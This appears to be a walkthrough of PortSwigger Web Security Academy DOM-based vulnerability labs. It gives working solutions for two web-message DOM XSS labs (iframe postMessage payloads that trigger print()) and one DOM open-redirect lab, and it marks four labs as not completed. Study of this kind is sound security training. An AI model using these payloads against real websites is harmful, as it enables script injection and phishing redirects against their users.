Walk-through of the DOM-based vulnerabilities lab on PortSwigger Web Security Academy. DOM-based vulnerabilities arise when a website contains JavaScript that takes an attacker-controllable value, known as a source, and passes it into a dangerous function, known as a sink.
- Practitioner – DOM XSS using web messages
- Practitioner – DOM XSS using web messages and a JavaScript URL
- Practitioner – DOM XSS using web messages and JSON.parse
- Practitioner – DOM-based open redirection
- Practitioner – DOM-based cookie manipulation
- Expert – Exploiting DOM clobbering to enable XSS
- Expert – Clobbering DOM attributes to bypass HTML filters
Practitioner – DOM XSS using web messages
This lab demonstrates a simple web message vulnerability. To solve this lab, use the exploit server to post a message to the target site that causes the print() function to be called.
See Web message manipulation (PortSwigger). The postMessage() method for sending web messages can lead to vulnerabilities if the event listener for receiving messages handles the incoming data in an unsafe way.
The Home page contains this JavaScript code:
<!-- Ads to be inserted here -->
<div id='ads'></div>
<script>
window.addEventListener('message', function(e) {
document.getElementById('ads').innerHTML = e.data;
})
</script>Open the Exploit server from the web application. Enter the iframe in the Body and click Deliver exploit to victim.
<iframe src="https://<LAB ID>.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">The postMessage method will send a web message to the home page. The event listener will insert the web message content into the <div> that is used for ads.
Practitioner – DOM XSS using web messages and a JavaScript URL
This lab demonstrates a DOM-based redirection vulnerability that is triggered by web messaging. To solve this lab, construct an HTML page on the exploit server that exploits this vulnerability and calls the print() function.
The Home page contains this JavaScript code:
<script>
window.addEventListener('message', function(e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
location.href = url;
}
}, false);
</script>Open the Exploit server from the web application. Enter the iframe in the Body and click Deliver exploit to victim.
<iframe src="https://<LAB ID>.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print();//http:','*')">The postMessage method will send a web message to the home page. The event listener will send the payload to the location.href sink.
Practitioner – DOM XSS using web messages and JSON.parse
NOT COMPLETED
Practitioner – DOM-based open redirection
This lab contains a DOM-based open-redirection vulnerability. To solve this lab, exploit this vulnerability and redirect the victim to the exploit server.
From the Home page, Click on View post for any blog post. Inspect the page. The link Back to Blog is generated based on the url parameter.
<a href="#" onclick="returnUrl = /url=(https?:\/\/.+)/.exec(location); location.href = returnUrl ? returnUrl[1] : "/"">Back to Blog</a>The url parameter is vulnerable to an open redirection vulnerability. Visit this link to solve the lab.
https://<LAB ID>.web-security-academy.net/post?postId=4&url=https://exploit-<EXPLOIT SERVER ID>.exploit-server.netPractitioner – DOM-based cookie manipulation
NOT COMPLETED
Expert – Exploiting DOM clobbering to enable XSS
NOT COMPLETED
Expert – Clobbering DOM attributes to bypass HTML filters
NOT COMPLETED